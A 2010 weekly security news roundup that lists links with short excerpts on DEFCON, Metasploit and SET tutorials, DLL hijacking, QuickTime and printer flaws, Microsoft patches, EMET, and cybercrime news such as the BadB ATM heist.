Week 35 in Review – 2010

Events Related:

• Slideshow: Fashion Statements from DEFCON 2010 – darkreading.com
  Hackers express themselves in more ways than just code.
• Security is a major theme at VMworld 2010. – vmware.com
  VMware launched 3 products under the vShield umbrella, to secure virtualized environments all the way from the edge to the endpoint.

Resources:

• IT Security Database – itsecdb.com
  This site collects OVAL(Open Vulnerability and Assessment Language) definitions from several sources like Mitre, Red Hat, Suse, NVD, Apache, etc.
• OWASP Secure Coding Practices – Quick Reference Guide – owasp.blogspot.com
  In addition, this project already has a very mature release, OWASP Secure Coding Practices – Quick Reference Guide/Version 1.0, which is under formal assessment and seeking Stable Release status.
• The Malware Analyst’s Cookbook, Fuzzy Hashing, and Detecting Self Modifying Code – jessekornblum.livejournal.com
  Michael Ligh’s upcoming book, Malware Analyst’s Cookbook and DVD, presents a novel way to detect self-modifying code using fuzzy hashing and memory forensics.
• (IN)Secure Magazine Issue 17 released – spookerlabs.blogspot.com
  New release of this awesome digital and free magazine
• Metasploit Megaprimer Videos – Over 2 hrs of video available till now! More being added daily – reddit.com
  One of the core issues with Metasploit seems to be the lack of documentation and some dude decided to create a video series.Looks like he is posting a new one daily and is gonna post around 20 of them of around 25 mins each.
• Windows Operating System Security Guides – disa.mil
  Some version of the STIGS excludes IAVM information. IAVM information is in the FOUO version available in the PKI-enabled area of IASE.

Tools:

• skipfish 1.64b – code.google.com/p/skipfish/
  A fully automated, active web application security reconnaissance tool.
• Wireshark 1.4.0, 1.2.11, and 1.0.16 Released – wireshark.org
  You can add a protocol field as a column by right-clicking on its packet detail item, and you can adjust some column preferences by right-clicking the column header.
• SSLMap: 0.2.0 Release – westcoasthackers.net
  Today we are releasing one of our private tools – SSLMap 0.2.0. SSLMap is a lightweight TLS/SSL cipher suite enumeration tool.
• Laudanum – sourceforge.net/projects/laudanum/
  Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.

• Use EMET to manage risk on your PC
  The previous version of EMET was strictly a command-line utility that enabled administrators to opt-in certain applications to specific exploit mitigations.
  • Microsoft Releases New Version of EMET Exploit Mitigation Toolkit – threatpost.com
  • The Enhanced Mitigation Experience Toolkit 2.0 is Now Available – technet.com
• cvechecker – cvechecker.sourceforge.net
  The latest development release is 0.5, released on 2010/09/02.
• PDFTemplate – didierstevens.com
  It’s particularly useful for malformed PDF files, like this example with PDFUnknown structures.
• Blind SQL Injection Exploitation with “Blind Cat” tool – itsecuritylab.eu
  Important: Blind Cat is not fully automated tool (not a kind of “one-click-ownage”), but if you will catch the idea of it – in return you would get a huge flexibility to exploit even most difficult blind SQL injections.

Techniques:

• Social-Engineer Toolkit v0.6.1 Tutorial – secmaniac.com
  Included in this tutorial is the Teensy USB/HID Attack Vector, the Man Left in the Middle Attack Vector, and the TabNabbing attack vector.
• X-Frame-Options Support in Firefox – michael-coates.blogspot.com
  X-frame-options is a header value that is set by the webserver which instructs supported browsers on whether to allow a particular page to be framed by other pages.
• Finding Mapped Drives with Meterpreter – skullsecurity.org
  The problem generally is that Novell handles things extremely differently then AD, that I assumed that things would be different.
• MITM, SSL and Session Fixation – ha.ckers.org
  It’s been known for a long time that HTTP can set cookies that can be read in HTTPS space because cookies don’t follow the same origin policy in the way that JavaScript does.
• Backdoor Password in Accton Based Switches – attackvector.org
  On the 15th of august 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent.
• Compromising Hosts With SNMP – attackvector.org
  A community string is, basically, the only authentication you need in order to gain access through SNMP.
• Cross Site Request Forgery (CSRF) PoC Template (by Javascript) – soroush.secproject.com
  CSRF PoC template is a JavaScript code which is very useful for security researchers and simplifies the art of creating CSRF Proof of Concepts.
• Cross-subdomain Session Fixation – skeptikal.org
  Today, I came across a variant which I’d theorized about in the past, but never bothered to find in the wild, and I think it merits some attention.
• To security people: I found this in google: http://bit.ly/bOr4wH If your email is not there, your website is! What’s this!? let me know @irsdl – twitter.com

Vulnerabilities:

• More DLL hijack news
  And the saga continues, the battle between Microsoft and its DLL security hole
  • An update on the DLL-preloading remote attack vector – technet.com
  • Microsoft tool for DLL vulnerability interferes with some applications – h-online.com
  • DLL hijacking – what are you doing? – sans.edu
  • Presenting DllHijackAuditor – Smart Tool to Audit Dll Hijack Vulnerability – securityxploded.com
  • Protecting Against Remote DLL Preloading Vulnerabilities – iss.net
  • KeePass version 2.12 <= Insecure DLL Hijacking Vulnerability (dwmapi.dll) – seclists.org
  • DLL Search Order Hijacking Revisited – mandiant.com
• New Remote Flaw in Apple QuickTime Bypasses ASLR and DEP – threatpost.com
  A Spanish security researcher has discovered a new vulnerability in Apple’s QuickTime software that can be used to bypass both ASLR and DEP on current versions of Windows and give an attacker control of a remote PC.
• Zscaler researcher finds scanning flaw in HP all-in-one printers – lastwatchdog.com
  Using the WebScan functionality, he could write a script to regularly run the scanner remotely, retrieving an image of anything that has been left on the scanner.
• TANDBERG Video Communication Server Arbitrary File Retrieval Vulnerability – securiteam.com
  This issue would allow an authenticated attacker (who has access as an administrator or less privileged user on the web administration interface) to retrieve files from the filesystem which are readable by the “nobody” system user.
• VMware Tools for Windows Local Binary Planting Vulnerability – securiteam.com
  There is a code execution vulnerability in VMware Tools for Windows that allows a local attacker (being able to log on locally to the virtual machine) to plant a malicious executable with a specific name on the local drive and wait for this executable to get launched when another user logs on to the virtual machine.

Vendor/Software Patches:

• Fixes from MS on the latest DLL flaw
  Microsoft released a fix for the DLL vuln that was discovered lately but it was flawed as well. There I fixed it.
  • MS Fix Shores Up Security for Windows Users – krebsonsecurity.com
  • Microsoft Publishes New FixIt Tool For DLL Bug – threatpost.com

Other News:

• Wolfhound Sniffs out Contraband Cell Phones – gearlog.com
  Using it requires little training and it doesn’t jam cell phones (which is illegal, since it prohibits legal cell phone use).
• Alleged Carder ‘BadB’ Charged in $9 Million ATM Heist – wired.com
  On Nov. 8, 2008, an army of cashers armed with cloned payroll cards simultaneously hit more than 2,000 ATMs around the world, looting them of $9.5 million in less than a day.
• That nice, new computerized car you just bought could be hackable – snosoft.blogspot.com
  While spoofing low-tire-pressure readings does not appear to be critical at first, it will lead to a dashboard warning and will likely cause the driver to pull over and inspect the tire.
• Pirate Bay Documentary in the Works – wired.com
  The director, Simon Klose, who has a law degree, has 200 hours of footage saved up and plans to record more during the trio’s appeal against their verdict, which is set for less than a month from now, on 28 September, 2010.
• Cyber Thieves Steal Nearly $1,000,000 from University of Virginia College – krebsonsecurity.com
  The attackers stole the money from The University of Virginia’s College at Wise, a 4-year public liberal arts college located in the town of Wise in southwestern Virginia.
• Snoop Dogg Joins the War on Cybercrime – securityweek.com
  In a somewhat untraditional partnership, Snoop Dogg and Symantec’s Norton want you to show off your lyrical skills on the subject of cybercrime and enter the “Hack is Wack” cybercrime rap contest.
• New government ID cards easily hacked – thelocal.de
  The sensitive personal information found on the new German identification cards with data chips scheduled for nationwide introduction this November can be easily hacked, according to testing done by a TV news show.
• Remediation – The Game – cigital.com
  Remediation has players compete to end up with the highest score while playing through real life software security scenarios.
• Ambition Over Intelligence – Twitter, OAuth, and Wrong – preachsecurity.blogspot.com
  If you do a web search for “hacked twitter account” you’ll get thousands upon thousands of entries.
• Tech Insight: Retooling Vulnerability Scanning, Penetration Testing for IPv6 – darkreading.com
  Traditional host discovery via network scanning won’t work with IPv6, but alternative methods are available.
• HP Holds Navy Network ‘Hostage’ for $3.3 Billion – wired.com
  After 10 years and nearly $10 billion, many sailors are tired of leasing their PCs, and relying on a private contractor to operate most of their data systems.
• Defending a New Domain – foreignaffairs.com
  Every day, U.S. military and civilian networks are probed thousands of times and scanned  millions of times.
• Defense Department’s Cyberwar Credibility Gap – securityweek.com
  The question posed by Wisniewski and others is, why would a foreign intelligence agency attack the U.S. government with such a low-powered weapon?